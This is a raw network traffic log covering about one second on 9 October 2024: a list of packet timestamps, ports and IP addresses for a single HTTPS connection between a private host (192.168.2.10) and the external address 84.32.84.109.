Oct 9, 2024 16:16:07.840637922 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.840676069 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.840943098 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.841001987 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.841027975 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.841115952 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.841119051 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.841125965 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.841150045 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.841296911 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.841327906 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.841332912 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.841340065 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.841362953 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.841376066 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.841401100 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.841403961 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.841516972 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.841525078 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.841531038 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.841545105 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.842108965 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.868731976 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.868808985 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.868812084 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.868827105 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.868849039 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.868871927 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.868877888 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.868897915 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.905344009 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.905376911 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.905402899 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.905436039 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.905451059 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.905453920 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.905550003 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.905566931 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.905575037 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.905594110 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.927350044 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.927392960 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.927407980 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.927429914 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.927443981 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.927503109 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.927622080 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.927640915 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.927649021 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.927670002 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.927670002 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.927701950 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.927716970 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.927723885 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.927742004 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.927927017 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.927963018 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.927969933 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.927979946 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.928011894 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.928025007 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.928064108 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.928069115 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.928076982 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.928111076 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.928328037 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.928364038 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.928380013 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.928386927 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.928402901 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.928412914 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.928426981 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.928431988 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.928452969 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.928603888 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.928653002 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.928668976 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.928675890 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.928688049 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.928709030 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.928729057 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.928734064 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.928769112 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.928785086 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.928819895 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.928869009 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.928905010 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.929002047 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.929039955 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.929048061 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.929088116 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.929228067 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.929260015 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.929276943 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.929284096 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.929296970 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.929318905 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.929368019 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.929404020 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.930741072 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.956878901 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.956955910 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.956974983 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.957004070 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.957022905 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.957151890 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.957151890 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.957151890 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.957164049 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.993138075 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.993191957 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.993215084 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.993231058 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.993242979 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.993257999 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.993288994 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.993288994 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.993302107 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.993411064 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.015018940 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.015050888 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.015105963 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.015130043 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.015145063 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.015180111 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.015224934 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.015300035 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.015346050 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.015353918 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.015399933 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.015516996 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.015567064 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.015573025 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.015608072 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.015630007 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.015634060 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.015649080 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.015713930 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.015744925 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.015757084 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.015763044 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.015783072 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.015954018 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.015994072 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.015997887 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.016005993 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.016033888 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.016047955 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.016082048 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.016089916 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.016097069 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.016118050 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.016163111 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.016196012 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.016207933 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.016215086 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.016233921 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.016311884 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.016371012 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.016377926 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.016402006 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.016422987 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.016428947 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.016441107 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.016495943 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.016535997 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.016537905 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.016546965 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.016664028 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.016700029 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.016751051 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.016757011 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.016794920 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.016813040 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.016818047 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.016824961 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.016835928 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.016851902 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.021919012 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.044800997 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.044867992 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.044887066 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.044899940 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.044917107 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.044920921 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.044962883 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.044965982 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.044979095 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.045784950 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.051407099 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.080800056 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.080873966 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.080946922 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.081002951 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.081044912 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.081099033 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.081130981 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.081187010 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.102737904 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.102813005 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.102823019 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.102855921 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.102864981 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.102968931 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.103017092 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.103032112 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.103070974 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.103130102 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.103182077 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.103245974 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.103344917 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.103357077 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.103370905 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.103394985 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.103523016 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.103571892 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.103579998 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.103638887 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.103667974 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.103677034 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.103698015 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.103749037 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.103827000 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.103833914 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.103868008 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.103869915 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.103902102 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.103924990 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.103995085 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.104082108 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.104088068 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.104118109 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.104124069 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.104144096 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.104161978 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.104257107 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.104355097 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.104371071 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.104381084 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.104398012 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.104454041 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.104502916 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.104509115 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.104547977 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.104552984 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.104583979 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.104605913 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.104700089 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.104794979 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.104823112 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.104832888 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.104851961 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.104888916 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.104938030 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.104944944 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.104984999 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.104991913 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.105016947 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.105041027 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.105107069 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.105154037 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.105160952 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.105196953 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.105201006 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.105226040 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.105248928 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.105315924 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.105364084 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.105371952 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.105400085 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.105407000 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.105422974 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.105447054 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.114517927 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.132783890 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.132920027 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.132951975 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.132965088 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.132983923 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.133019924 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.133106947 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.133111954 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.133137941 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.133234978 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.168708086 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.168853998 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.168867111 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.168904066 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.168920994 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.168947935 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.169020891 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.169053078 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.169059992 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.169073105 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.190561056 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.190623045 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.190634966 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.190665007 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.190692902 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.190700054 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.190723896 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.190779924 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.190824986 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.190831900 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.190900087 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.190910101 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.190929890 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.190980911 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.191035032 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.191088915 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.191138983 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.191188097 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.191256046 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.191301107 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.191351891 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.191407919 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.191472054 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.191567898 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.191597939 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.191679001 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.191693068 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.191740990 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.191797018 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.191852093 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.192178011 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.192243099 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.192281961 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.192336082 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.192395926 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.192490101 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.192517042 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.192524910 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.192553043 CEST	49723	443	192.168.2.10	84.32.84.109
